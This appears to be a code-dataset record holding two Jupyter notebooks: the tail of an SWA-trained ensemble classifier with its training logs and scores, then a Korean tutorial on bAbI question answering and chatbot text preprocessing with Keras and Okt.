3.214402207119742e-05, default loss 3.250504008558116e-05\n127 New best found: 3.214402207119742e-05\nmodel is 3 epochs old\nnew model is 3 epochs old\n128 swa loss 3.2091513115524464e-05, default loss 3.256766885649915e-05\n128 New best found: 3.2091513115524464e-05\nmodel is 4 epochs old\nnew model is 4 epochs old\n129 swa loss 3.208314313660644e-05, default loss 3.270737938301272e-05\n129 New best found: 3.208314313660644e-05\nmodel is 5 epochs old\nnew model is 5 epochs old\n130 swa loss 3.2064450477941e-05, default loss 3.264426856985444e-05\n130 New best found: 3.2064450477941e-05\nmodel is 6 epochs old\nnew model is 6 epochs old\n131 swa loss 3.203814258981529e-05, default loss 3.2696535788666445e-05\n131 New best found: 3.203814258981529e-05\nmodel is 7 epochs old\nnew model is 7 epochs old\n132 swa loss 3.20390896257448e-05, default loss 3.278792753612272e-05\nmodel is 8 epochs old\nnew model is 8 epochs old\n133 swa loss 3.203521778755422e-05, default loss 3.258784056869484e-05\n133 New best found: 3.203521778755422e-05\nmodel is 9 epochs old\nnew model is 9 epochs old\n134 swa loss 3.203227607120931e-05, default loss 3.258650972911344e-05\n134 New best found: 3.203227607120931e-05\nmodel is 10 epochs old\nnew model is 10 epochs old\n135 swa loss 3.2054988226743826e-05, default loss 3.29165085785239e-05\nmodel is 11 epochs old\nnew model is 11 epochs old\n136 swa loss 3.2065276659134796e-05, default loss 3.290205558854912e-05\nmodel is 12 epochs old\nnew model is 12 epochs old\n137 swa loss 3.2055375399553827e-05, default loss 3.250493022840945e-05\nmodel is 13 epochs old\nnew model is 13 epochs old\n138 swa loss 3.2046686135556315e-05, default loss 3.246360355010168e-05\nmodel is 14 epochs old\nnew model is 14 epochs old\n139 swa loss 3.203830921498427e-05, default loss 3.246197410500905e-05\nmodel is 15 epochs old\nnew model is 15 epochs old\n140 swa loss 3.203849638197394e-05, default loss 3.250507379707308e-05\nmodel is 16 epochs old\nnew model is 16 epochs old\n141 swa loss 3.204608376124114e-05, default loss 3.260884068369432e-05\nmodel is 17 epochs old\nnew model is 17 epochs old\n142 swa loss 3.2051994474676296e-05, default loss 
3.305559441042328e-05\nmodel is 18 epochs old\nnew model is 18 epochs old\n143 swa loss 3.204933308352901e-05, default loss 3.249281423333595e-05\nmodel is 19 epochs old\nnew model is 19 epochs old\n144 swa loss 3.2052260764020685e-05, default loss 3.2737132968265605e-05\nmodel is 20 epochs old\nnew model is 20 epochs old\n145 swa loss 3.205150359848564e-05, default loss 3.2709347686609234e-05\nmodel is 21 epochs old\nnew model is 21 epochs old\n146 swa loss 3.2043437250972684e-05, default loss 3.233272486032045e-05\nmodel is 22 epochs old\nnew model is 22 epochs old\n147 swa loss 3.203905765424241e-05, default loss 3.251201085546101e-05\nmodel is 23 epochs old\nnew model is 23 epochs old\n148 swa loss 3.2032601898901896e-05, default loss 3.253291424439921e-05\nmodel is 24 epochs old\nnew model is 24 epochs old\n149 swa loss 3.202165946859929e-05, default loss 3.2453614879739155e-05\n149 New best found: 3.202165946859929e-05\nmodel is 25 epochs old\nnew model is 25 epochs old\n150 swa loss 3.201618709693408e-05, default loss 3.232309290770231e-05\n150 New best found: 3.201618709693408e-05\nmodel is 26 epochs old\nnew model is 26 epochs old\n151 swa loss 3.201142377440587e-05, default loss 3.253383029752658e-05\n151 New best found: 3.201142377440587e-05\nmodel is 27 epochs old\nnew model is 27 epochs old\n152 swa loss 3.200545020459221e-05, default loss 3.2428580517522144e-05\n152 New best found: 3.200545020459221e-05\nmodel is 28 epochs old\nnew model is 28 epochs old\n153 swa loss 3.2007076303660195e-05, default loss 3.258682629551746e-05\nmodel is 29 epochs old\nnew model is 29 epochs old\n154 swa loss 3.200513206440468e-05, default loss 3.284024418488672e-05\n154 New best found: 3.200513206440468e-05\nmodel is 30 epochs old\nnew model is 30 epochs old\n155 swa loss 3.200596160232034e-05, default loss 3.255328578185347e-05\nmodel is 31 epochs old\nnew model is 31 epochs old\n156 swa loss 3.199855685006587e-05, default loss 3.2459988162496235e-05\n156 New best found: 3.199855685006587e-05\nmodel is 32 epochs old\nnew model is 32 epochs old\n157 swa loss 3.1996085069417334e-05, default loss 3.2422143356145824e-05\n157 New best found: 3.1996085069417334e-05\nmodel is 33 epochs old\nnew model is 33 epochs old\n158 swa loss 3.1994705304673144e-05, default loss 3.256531336542617e-05\n158 New best found: 3.1994705304673144e-05\nmodel is 34 epochs old\nnew model is 34 epochs old\n159 swa loss 3.199708605026487e-05, default loss 3.294959547614317e-05\nmodel is 35 epochs old\nnew model is 35 epochs old\n160 swa loss 3.19986151101203e-05, default loss 3.2690953704188255e-05\nmodel is 36 epochs old\nnew model is 36 epochs old\n161 swa loss 3.1998294590430264e-05, default loss 3.276537811870186e-05\nmodel is 37 epochs old\nnew model is 37 epochs old\n162 swa loss 3.1999839457601796e-05, default loss 3.280843444999087e-05\nmodel is 38 epochs old\nnew model is 38 epochs old\n163 swa loss 3.199927832258734e-05, default loss 3.255664740145912e-05\nmodel is 39 epochs old\nnew model is 39 epochs old\n164 swa loss 3.200233988890934e-05, default loss 3.26348186491424e-05\nmodel is 40 epochs old\nnew model is 40 epochs old\n165 swa loss 3.200585248462234e-05, default loss 3.300856329402918e-05\nmodel is 41 epochs old\nnew model is 41 epochs old\n166 swa loss 3.200239436888103e-05, default loss 3.2953081365906554e-05\nmodel is 42 epochs old\nnew model is 42 epochs old\n167 swa loss 3.199528419008675e-05, default loss 3.2820024400737e-05\nmodel is 43 epochs old\nnew model is 43 epochs old\n168 swa loss 
3.199508155561728e-05, default loss 3.254037656632815e-05\nmodel is 44 epochs old\nnew model is 44 epochs old\n169 swa loss 3.199640764666626e-05, default loss 3.279248891872598e-05\nmodel is 45 epochs old\nnew model is 45 epochs old\n170 swa loss 3.199810921606272e-05, default loss 3.270488206748675e-05\nmodel is 46 epochs old\nnew model is 46 epochs old\n171 swa loss 3.199646691640401e-05, default loss 3.231664303333567e-05\nmodel is 47 epochs old\nnew model is 47 epochs old\n172 swa loss 3.199763960704779e-05, default loss 3.253691747446211e-05\nmodel is 48 epochs old\nnew model is 48 epochs old\n173 swa loss 3.1999424333330324e-05, default loss 3.2547429209697255e-05\nmodel is 49 epochs old\nnew model is 49 epochs old\n174 swa loss 3.1994691086346026e-05, default loss 3.246355856011902e-05\n174 New best found: 3.1994691086346026e-05\nmodel is 50 epochs old\nnew model is 50 epochs old\n175 swa loss 3.199043564879936e-05, default loss 3.282002160777827e-05\n175 New best found: 3.199043564879936e-05\nmodel is 51 epochs old\nnew model is 51 epochs old\n176 swa loss 3.1988215248678005e-05, default loss 3.269261726541341e-05\n176 New best found: 3.1988215248678005e-05\n" ] ], [ [ "Once SWA is activated at epoch 125, we find that the validation loss goes through a rapid decrease followed by a plateau with large suppression of the statistical fluctuations.\n\nComparing to 5_Model_Data_Augmentation the metrics are mostly the same, except for the AMS which moves from3.98 to 4.04.", "_____no_output_____" ], [ "## Construct ensemble", "_____no_output_____" ] ], [ [ "with open('train_weights/resultsFile.pkl', 'rb') as fin: \n results = pickle.load(fin)", "_____no_output_____" ], [ "ensemble, weights = assembleEnsemble(results, ensembleSize, ensembleMode, compileArgs)", "Choosing ensemble by loss\nModel 0 is 6 with loss = 3.056904335753643e-05\nModel 1 is 9 with loss = 3.071672455570552e-05\nModel 2 is 3 with loss = 3.120919069624506e-05\nModel 3 is 4 with loss = 3.186284687035368e-05\nModel 4 is 1 with loss = 3.198194178443449e-05\nModel 5 is 0 with loss = 3.1988215248678005e-05\nModel 6 is 2 with loss = 3.202857282279059e-05\nModel 7 is 7 with loss = 3.212407101093995e-05\nModel 8 is 5 with loss = 3.249272352986736e-05\nModel 9 is 8 with loss = 3.2645716380682534e-05\n" ] ], [ [ "## Response on validation data with TTA", "_____no_output_____" ] ], [ [ "valData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'val.hdf5', \"r+\"), inputPipe=inputPipe,\n rotate = True, reflect = True, augRotMult=8)", "_____no_output_____" ], [ "batchEnsemblePredict(ensemble, weights, valData, ensembleSize=ensembleSize, verbose=1)", "Predicting batch 1 out of 10\nPrediction took 0.01391659113280475s per sample\n\nPredicting batch 2 out of 10\nPrediction took 0.012305215643905102s per sample\n\nPredicting batch 3 out of 10\nPrediction took 0.0121675153426826s per sample\n\nPredicting batch 4 out of 10\nPrediction took 0.012166589914634823s per sample\n\nPredicting batch 5 out of 10\nPrediction took 0.012019737253896892s per sample\n\nPredicting batch 6 out of 10\nPrediction took 0.011995233291387557s per sample\n\nPredicting batch 7 out of 10\nPrediction took 0.012182317556254567s per sample\n\nPredicting batch 8 out of 10\nPrediction took 0.011865544037148356s per sample\n\nPredicting batch 9 out of 10\nPrediction took 0.012033153799176216s per sample\n\nPredicting batch 10 out of 10\nPrediction took 0.012129837618768215s per sample\n\n" ], [ "print('Testing ROC AUC: unweighted {}, weighted 
{}'.format(roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source)),\n roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source), sample_weight=getFeature('weights', valData.source))))", "Testing ROC AUC: unweighted 0.9032920169789936, weighted 0.9360693746679931\n" ], [ "amsScanSlow(convertToDF(valData.source))", "50000 candidates loaded\n" ], [ "%%time\nbootstrapMeanAMS(convertToDF(valData.source), N=512)", "50000 candidates loaded\n\nMean AMS=4.0+-0.2, at mean cut of 0.961+-0.008\nExact mean cut 0.9606163307325915, corresponds to AMS of 3.9670679002860356\nCPU times: user 2.58 s, sys: 15.1 s, total: 17.6 s\nWall time: 2min 9s\n" ] ], [ [ "In the validation metrics we also find improvement over 5_Model_Data_Augmentation: overallAMS moves from 3.97 to 3.99, and AMS corresponding to mean cut increases to 3.97 from 3.91.", "_____no_output_____" ], [ "# Test scoring", "_____no_output_____" ] ], [ [ "testData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'testing.hdf5', \"r+\"), inputPipe=inputPipe,\n rotate = True, reflect = True, augRotMult=8)", "_____no_output_____" ], [ "%%time\nbatchEnsemblePredict(ensemble, weights, testData, ensembleSize=ensembleSize, verbose=1)", "Predicting batch 1 out of 10\nPrediction took 0.011936514278721402s per sample\n\nPredicting batch 2 out of 10\nPrediction took 0.01206147660294717s per sample\n\nPredicting batch 3 out of 10\nPrediction took 0.012110572331551123s per sample\n\nPredicting batch 4 out of 10\nPrediction took 0.012047166942347858s per sample\n\nPredicting batch 5 out of 10\nPrediction took 0.01204522031410174s per sample\n\nPredicting batch 6 out of 10\nPrediction took 0.012004600540413099s per sample\n\nPredicting batch 7 out of 10\nPrediction took 0.01202152247525413s per sample\n\nPredicting batch 8 out of 10\nPrediction took 0.012035000745901329s per sample\n\nPredicting batch 9 out of 10\nPrediction took 0.01231693161666732s per sample\n\nPredicting batch 10 out of 10\nPrediction took 0.012164079189165072s per sample\n\nCPU times: user 2h, sys: 10min 39s, total: 2h 10min 39s\nWall time: 1h 50min 40s\n" ], [ "scoreTestOD(testData.source, 0.9606163307325915)", "Public:Private AMS: 3.6798281799107344 : 3.7847099714589465\n" ] ], [ [ "Unfortunately, applying the cut to the test data shows an improvement in the public score (3.65->3.68) but a large decrease in private score (3.82->3.79)", "_____no_output_____" ], [ "# Save/Load", "_____no_output_____" ] ], [ [ "name = \"weights/Swish_SWA-125\"", "_____no_output_____" ], [ "saveEnsemble(name, ensemble, weights, compileArgs, overwrite=1)", "_____no_output_____" ], [ "ensemble, weights, compileArgs, _, _ = loadEnsemble(name)", "_____no_output_____" ] ] ]
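The notebook above trains with `swaStart=125`, i.e. a running average of the network weights is kept from epoch 125 onwards. That logic lives in the repository's custom `batchTrainClassifier` (including the renewal and SWA-vs-default loss comparison visible in the training log), which is not reproduced in this excerpt. The callback below is only a minimal sketch of the running-average idea, written against plain Keras, for readers who want the gist without the custom modules.

```python
import numpy as np
from keras.callbacks import Callback

class SimpleSWA(Callback):
    """Minimal stochastic weight averaging: from `start_epoch` onwards keep an
    equal-weight running average of the model weights after every epoch."""

    def __init__(self, start_epoch):
        super(SimpleSWA, self).__init__()
        self.start_epoch = start_epoch
        self.swa_weights = None
        self.n_models = 0

    def on_epoch_end(self, epoch, logs=None):
        if epoch < self.start_epoch:
            return
        current = self.model.get_weights()
        if self.swa_weights is None:
            self.swa_weights = current
        else:
            # running mean: w_avg <- (n * w_avg + w_new) / (n + 1)
            self.swa_weights = [(self.n_models * avg + w) / (self.n_models + 1)
                                for avg, w in zip(self.swa_weights, current)]
        self.n_models += 1

    def on_train_end(self, logs=None):
        if self.swa_weights is not None:
            self.model.set_weights(self.swa_weights)
```

In practice one keeps both the averaged and the live weights and validates whichever is better each epoch, which is exactly the "swa loss" versus "default loss" comparison printed in the log.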
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1c12c25c4587472b5f92d6b4ac14715faf730e
230,226
ipynb
Jupyter Notebook
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
55.637023
41,428
0.699474
[ [ [ "# 탐구실험용 toy 코드 (Facebook 바비 Question-Answer)\n\n<p> &nbsp;\n \n# +++++++++++++++++++++++++++++++++++++++++++++\n\n", "_____no_output_____" ], [ "# toy 코드의 한계 및 약점은 ? 약점을 보강할 수 있는 방법 ?\n\n<p>\n\n# 영어와 한글 데이터의 부족을 한영 번역기로 try 하며 탐구\n \n<p> &nbsp;\n \n## +++++++++++++++++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n## toy 코드를 통해 약점을 알아내고, 데이터를 조작하며 (좋은 뜻으로 조절),\n\n## 데이터가 어떻게 변형되고, 행렬의 weight와 정확도가 어떻게 변화하는지?\n\n## input 과 중간의 형태, 그리고 최종 output 의 흐름을 스토리텔링하며 탐구 !", "_____no_output_____" ], [ "# =========== 탐구과제용 :기본적인 문제 =========\n\n# 어떻게 AI 와 수학교육이 융합하여 발전할 수 있을까?\n\n# 영어 데이터를 한글 학습데이터를 번역하고 보강한다.\n\n# 한국어 질문-응답 수학학습 시스템을 만들 수 있을까?\n\n# 무엇보다도, 데이터를 처리하는 방법을 먼저 익히고\n\n# 데이터로 딥러닝하는 알고리즘과 attention 을 탐구하자.\n\n# ==========================================", "_____no_output_____" ], [ "# Babi 문제 (인터넷에서 babi 문제와 데이터를 찾아본다)\n\n# 교재 130 페이지 참고", "_____no_output_____" ] ], [ [ "# babi 데이터 \n\n Sandra travelled to the kitchen. \n Sandra travelled to the hallway. \n Mary went to the bathroom. \n Sandra moved to the garden. \n\n Where is Sandra ?\n Ground Truth: Garden (based on single supporting fact 4)\n\n### Each sentence is provided with an ID. The IDs for a given “story” start at 1 and increase. \n### When the IDs in a file reset back to 1 you can consider the following sentences as a new “story”. \n### Supporting fact ID refer to the sentences within a “story”.\n\n 1 Mary moved to the bathroom.\n 2 John went to the hallway.\n 3 Where is Mary? bathroom 1\n 4 Daniel went back to the hallway.\n 5 Sandra moved to the garden.\n 6 Where is Daniel? hallway 4\n 7 John moved to the office.\n 8 Sandra journeyed to the bathroom.\n 9 Where is Daniel? hallway 4\n 10 Mary moved to the hallway.\n 11 Daniel travelled to the office.\n 12 Where is Daniel? office 11\n 13 John went back to the garden.\n 14 John moved to the bedroom.\n 15 Where is Sandra? bathroom 8\n 1 Sandra travelled to the office.\n 2 Sandra went to the bathroom.\n 3 Where is Sandra? 
bathroom 2\n \n \n", "_____no_output_____" ] ], [ [ "## 바비 데이터 github : https://github.com/andri27-ts/bAbI\n\n<p>\n\n\n# 수학교육 탐구과제로 도전가능한 문제 \n \n# QA6 - Yes/No Questions\t\n\n# QA7 - Counting\t\n", "_____no_output_____" ], [ "### 바비 데이터 : https://github.com/harvardnlp/MemN2N/tree/master/babi_data/en\n\n\n<p> &nbsp;\n \n \n# settings ==> .keras ==> dataset 안에 데이터 저장됨 \n\n\nhttps://appliedmachinelearning.blog/2019/05/01/developing-factoid-question-answering-system-on-babi-facebook-data-set-python-keras-part-1/\n\n\n", "_____no_output_____" ], [ "# Feature Extraction\n\nLet us first write a helper function to vectorize each stories in order to fetch it to memory network model which we will be creating later.", "_____no_output_____" ], [ "https://appliedmachinelearning.blog/2019/05/02/building-end-to-end-memory-network-for-question-answering-system-on-babi-facebook-data-set-python-keras-part-2/", "_____no_output_____" ], [ "# ===================================\n\n\n# 바비 데이터로 뉴럴네트워크 모델 학습시키기 \n\n\n<p> &nbsp;", "_____no_output_____" ], [ "\n# === 자연어처리 : babi QAchatbot 만들기 ===\n", "_____no_output_____" ], [ "<p> &nbsp;\n\n# 본래의 Babi QA6 데이터는 data_in 에있다\n\n## ./data_in/babi_qa6_train.txt\n\n## ./data_in/babi_qa6_test.txt\n\n\n<p> &nbsp;\n \n# =================================\n \n<p> &nbsp;\n\n# toy code 에서는 다음 데이터를 사용한다.\n\n## ./data_in/babi_train_qa.txt\n\n## ./data_in/babi_test_qa.txt\n \n## toy code 의 데이터와 본래 데이터의 차이점은 ??\n \n## +++++++++++++++++++++++++++++++++", "_____no_output_____" ], [ "<p> &nbsp;\n\n# ========= Toy 바비 QA 탐구===========", "_____no_output_____" ], [ "\n", "_____no_output_____" ] ], [ [ "#Library Imports\n\nimport pickle\n\nimport numpy as np\nimport pandas as pd", "_____no_output_____" ] ], [ [ "# pickle 데이터 파일과 csv 데이터 파일\n\n## 교재 80페이지의 pandas, numpy 를 익힌다. ", "_____no_output_____" ] ], [ [ "#retrieve training data\n\n# IOPub data rate exceeded. \n# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nunpickled_df = pd.read_pickle('./data_in/babi_train_qa.txt')\n# print( unpickled_df)== list 이다 \n \ndf = pd.DataFrame( unpickled_df ) \n# df = pd.DataFrame(some_list, columns=[\"colummn\"]) \n\ndf.to_csv('./data_in/babi_train_qa.csv', index=False)\n\nprint( df[0:5] ) \n\ndf.shape # 학습 데이터의 갯수 일만개 :", " 0 \\\n0 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n1 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n2 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n3 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n4 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n\n 1 2 \n0 [Is, Sandra, in, the, hallway, ?] no \n1 [Is, Daniel, in, the, bathroom, ?] no \n2 [Is, Daniel, in, the, office, ?] no \n3 [Is, Daniel, in, the, bedroom, ?] yes \n4 [Is, Daniel, in, the, bedroom, ?] 
yes \n" ], [ "#retrieve training data\n\n# IOPub data rate exceeded.\n# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nunpickled_df = pd.read_pickle('./data_in/babi_test_qa.txt')\n# print( unpickled_df)== list 이다 \n \ndf = pd.DataFrame( unpickled_df ) \n# df = pd.DataFrame(some_list, columns=[\"colummn\"]) \n\ndf.to_csv('./data_in/babi_test_qa.csv', index=False)\n\nprint( df[0][0] )\nprint( df[1][0] )\nprint( df[2][0] )\n\nprint( df[0][4] )\nprint( df[1][4] )\nprint( df[2][4] )\n\nprint( df[0][5] )\nprint( df[1][5] )\nprint( df[2][5] )\n\nprint( df.shape ) # ===> 테스트 데이터의 갯수 1000 개", "['Mary', 'got', 'the', 'milk', 'there', '.', 'John', 'moved', 'to', 'the', 'bedroom', '.']\n['Is', 'John', 'in', 'the', 'kitchen', '?']\nno\n['Mary', 'got', 'the', 'milk', 'there', '.', 'John', 'moved', 'to', 'the', 'bedroom', '.', 'Mary', 'discarded', 'the', 'milk', '.', 'John', 'went', 'to', 'the', 'garden', '.', 'Daniel', 'moved', 'to', 'the', 'bedroom', '.', 'Daniel', 'went', 'to', 'the', 'garden', '.', 'Daniel', 'travelled', 'to', 'the', 'bathroom', '.', 'Sandra', 'travelled', 'to', 'the', 'bedroom', '.', 'Mary', 'took', 'the', 'football', 'there', '.', 'Sandra', 'grabbed', 'the', 'milk', 'there', '.']\n['Is', 'Daniel', 'in', 'the', 'bedroom', '?']\nno\n['Daniel', 'went', 'back', 'to', 'the', 'kitchen', '.', 'Mary', 'grabbed', 'the', 'apple', 'there', '.']\n['Is', 'Daniel', 'in', 'the', 'office', '?']\nno\n(1000, 3)\n" ] ], [ [ "\n# [문제] 아래 QA6 text 파일과 비교하여보라\n\n## ./data_in/babi_qa6_train.txt\n\n## ./data_in/babi_qa6_test.txt", "_____no_output_____" ] ], [ [ "with open('./data_in/babi_train_qa.txt', 'rb') as f:\n train_data = pickle.load(f)\n\nprint( train_data[10] )\ntrain_data[0][0:3]", "(['Sandra', 'went', 'back', 'to', 'the', 'hallway', '.', 'Sandra', 'moved', 'to', 'the', 'office', '.'], ['Is', 'Sandra', 'in', 'the', 'office', '?'], 'yes')\n" ], [ "#retrieve test data\n\nwith open('./data_in/babi_test_qa.txt', 'rb') as f:\n test_data = pickle.load(f)", "_____no_output_____" ], [ "#Number of training instances\nlen(train_data)", "_____no_output_____" ], [ "#Number of test instances\n\nlen(test_data)", "_____no_output_____" ], [ "#Example of one of the instances\n\ntrain_data[10]", "_____no_output_____" ], [ "' '.join(train_data[10][0])", "_____no_output_____" ], [ "' '.join(train_data[10][1])", "_____no_output_____" ], [ "train_data[10][2]", "_____no_output_____" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n# [과제] 한글 챗복 데이터 다루기 \n \n \n<p> &nbsp;\n \n# ++++++++++++++++++++++++++++++++++++\n\n<p>\n\n# [과제 1] data_nmt/conversaiton2.txt 데이터 다루기", "_____no_output_____" ] ], [ [ "import pandas as pd\n\nfile = open( \"./data_nmt/conversation2.txt\", \"r\" , encoding=\"utf-8\")\ndata = file.readlines()\ndf1 = []\nfor ii in data:\n df1.append(ii[:-1])\n\n\ndf2 = pd.DataFrame( df1 )\n \ndf2.to_csv( './data_nmt/conversation2.csv' , index=False, encoding='utf-8')\n\n\ndatacsv = pd.read_csv( './data_nmt/conversation2.csv' , encoding='utf-8')\n\ndatacsv", "_____no_output_____" ], [ "print( datacsv[0:5] )\n\nresult_data=list( )\n\ninput_data = list( datacsv['0'][0:5] )\n######################################\n\nfor seq in input_data :\n print( seq )\n result = \" \".join( okt.morphs(seq.replace(' ', '')))\n result_data.append( result )\n \nprint( result_data )\n\ndatas = []\n\ndatas.extend( result_data )\n \ndatas", " 0\n0 어떻게 지내세요?\n1 잘 지내고 있어요. 당신은요?\n2 저도 잘 지내고 있어요.\n3 네, 그럼 안녕히 가세요.\n4 계속 연락해요.\n어떻게 지내세요?\n잘 지내고 있어요. 
당신은요?\n저도 잘 지내고 있어요.\n네, 그럼 안녕히 가세요.\n계속 연락해요.\n['어떻게 지내세요 ?', '잘 지내고있어요 . 당 신 은 요 ?', '저 도 잘 지내고있어요 .', '네 , 그럼 안녕히가세요 .', '계속 연락 해 요 .']\n" ], [ "\nimport re\n\nFILTERS = \"([~.,!?\\\"':;)(])\"\nCHANGE_FILTER = re.compile(FILTERS)\n\nvocabwords = []\nfor sentence in datas:\n # FILTERS = \"([~.,!?\\\"':;)(])\"\n # 위 필터와 같은 값들을 정규화 표현식을 \n # 통해서 모두 \"\" 으로 변환 해주는 부분이다.\n sentence = re.sub(CHANGE_FILTER, \"\", sentence)\n for word in sentence.split():\n vocabwords.append(word)\n \nprint( vocabwords )", "['어떻게', '지내세요', '잘', '지내고있어요', '당', '신', '은', '요', '저', '도', '잘', '지내고있어요', '네', '그럼', '안녕히가세요', '계속', '연락', '해', '요']\n" ], [ "import re\n\n\nDATA_PATH=\"./data_nmt/conversation2.txt\" \n############## 챗봇 데이터 ############\n\n\n\n\ndef Tokenizer( sentence ):\n token=[]\n for word in sentence.strip().split():\n token.extend(re.compile(\"([.,!?\\\"':;)(])\").split(word))\n \n ret=[t for t in token if t]\n return ret \n\n \n \nwordsk=[]\ndatask=[]\n\n\n\nwith open( DATA_PATH , 'r' , encoding='utf-8' ) as f:\n lines=f.read()\n datask.append(lines)\n wordsk=Tokenizer( lines )\n wordsk=list( set( wordsk ) )\n\n \n# list <=== datas.shape \n\n\nprint( wordsk[0:10] )\n\ndatask[0][0:100] ", "['스트레스', '캐나다의', '다음에', '볼링이나', '미용실은', '지갑', '4분전에요', '바쿠', '언제', '이메일로']\n" ], [ "from konlpy.tag import Okt\n\nokt = Okt()\n\n\nwordsz=[]\ndatasz=[]\n\nwith open( DATA_PATH , 'r', encoding='utf-8') as content_file :\n for con in content_file: \n content = content_file.read()\n datasz.append( content )\n wordsz.extend( okt.morphs(content) )\n wordsz = list(set(wordsz))\n\n \nprint( wordsz[0:10] )\n\ndatasz[0][0:100] ", "['칠까', '스트레스', '전부터', '의', '지갑', '바쿠', '언제', '레스', '야', '모르는']\n" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p>\n\n# [과제 2] data_in/ChatBotData.csv 데이터 다루기", "_____no_output_____" ] ], [ [ "import pandas as pd\n\n\n\ndata = pd.read_csv( './data_in/ChatBotData.csv' , encoding='utf-8')\n\nprint( data.head() ) \n\nquestions, answers = list( data['Q'] ) , list( data['A'] )\n\n\nfrom konlpy.tag import Okt # Twitter\nfrom tqdm import tqdm\n \nmorph_analyzer = Okt() # Twitter()\n# 형태소 토크나이즈 결과 문장을 받을\n# 리스트를 생성합니다.\n\nresult_data = list()\n# 데이터에 있는 매 문장에 대해 토크나이즈를\n# 할 수 있도록 반복문을 선언합니다.\n\n\n# Twitter.morphs 함수를 통해 토크나이즈 된\n# 리스트 객체를 받고 다시 공백문자를 기준으로\n# 하여 문자열로 재구성 해줍니다.\nfor seq in tqdm( questions + answers ):\n morphlized_seq = \" \".join(morph_analyzer.morphs(seq.replace(' ', '')))\n result_data.append(morphlized_seq)\n \n \nquestions = result_data \n ", " 0%| | 32/23646 [00:00<01:18, 302.70it/s]" ], [ "\nimport re\n\nFILTERS = \"([~.,!?\\\"':;)(])\"\nCHANGE_FILTER = re.compile(FILTERS)\n\n\nvocabwords = []\nfor sentence in datas:\n # FILTERS = \"([~.,!?\\\"':;)(])\"\n # 위 필터와 같은 값들을 정규화 표현식을 \n # 통해서 모두 \"\" 으로 변환 해주는 부분이다.\n sentence = re.sub(CHANGE_FILTER, \"\", sentence)\n for word in sentence.split():\n vocabwords.append(word)\n \n\nprint( len(vocabwords) )\n \nvocab = set( vocabwords )\n\nprint( len(vocab) )\n\nvocfile = './data_out/vocabularyData.txt'\n\nwith open(vocfile , 'w' , encoding='utf-8') as wf:\n for w in vocab:\n wf.write(w+\"\\n\")\n print(\"단어장이 새로 만들어짐 !!\")\n", "111808\n15680\n단어장이 새로 만들어짐 !!\n" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p>\n \n\n# [문제] 한글 단어장을 만드는 과정을 이해하자 !!", "_____no_output_____" ], [ "# ++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n# 챗봇 데이터의 단어장으로 문장을 벡터로 표현 !!\n \n \n<p> &nbsp;\n \n# ++++++++++++++++++++++++++++++++++++\n\n", "_____no_output_____" ], [ "## 교재 30페이지의 내용과 비교한다\n\n", "_____no_output_____" ] ], [ [ 
"set1=[1,2,3,4,5, 1,2,3,9]\nset2=[2,3,5,6,7, 2,3,4,8]\n\nset1 = set(set1) \n\nmoim = set()\n\nmoim = moim.union( set1)\nmoim = moim.intersection( set(set2))\nprint( moim )\n", "{2, 3, 4, 5}\n" ] ], [ [ "# ./data_in/babi_train_qa.txt 데이터", "_____no_output_____" ] ], [ [ "import pickle\n\n\nwith open('./data_in/babi_train_qa.txt', 'rb') as f:\n train_data = pickle.load(f)\n\nprint( train_data[10] )\ntrain_data[0][0:3]\n\n\n#First we will build a set of all the words in the dataset:\nvocab = set()\nfor story, question, answer in train_data:\n vocab = vocab.union(set(story)) #Set returns unique words in the sentence\n #Union returns the unique common elements from a two sets\n vocab = vocab.union(set(question))", "(['Sandra', 'went', 'back', 'to', 'the', 'hallway', '.', 'Sandra', 'moved', 'to', 'the', 'office', '.'], ['Is', 'Sandra', 'in', 'the', 'office', '?'], 'yes')\n" ], [ "vocab.add('no')\nvocab.add('yes')", "_____no_output_____" ], [ "for x in vocab :\n if( x.startswith('b')) :\n print( x )", "back\nbathroom\nbedroom\n" ], [ "#Calculate len and add 1 for Keras placeholder - Placeholders are used to feed in the data to the network. \n#They need a data type, and have optional shape arguements.\n#They will be empty at first, and then the data will get fed into the placeholder\n\nvocab_len = len(vocab) + 1", "_____no_output_____" ], [ "vocab_len", "_____no_output_____" ], [ "#retrieve test data\n\nwith open('./data_in/babi_test_qa.txt', 'rb') as f:\n test_data = pickle.load(f)\n \n#Now we are going to calculate the longest story and the longest question\n#We need this for the Keras pad sequences. \n\n#Keras training layers expect all of the input to have the same length, so \n#we need to pad \n\nall_data = test_data + train_data", "_____no_output_____" ], [ "all_story_lens = [len(data[0]) for data in all_data]", "_____no_output_____" ], [ 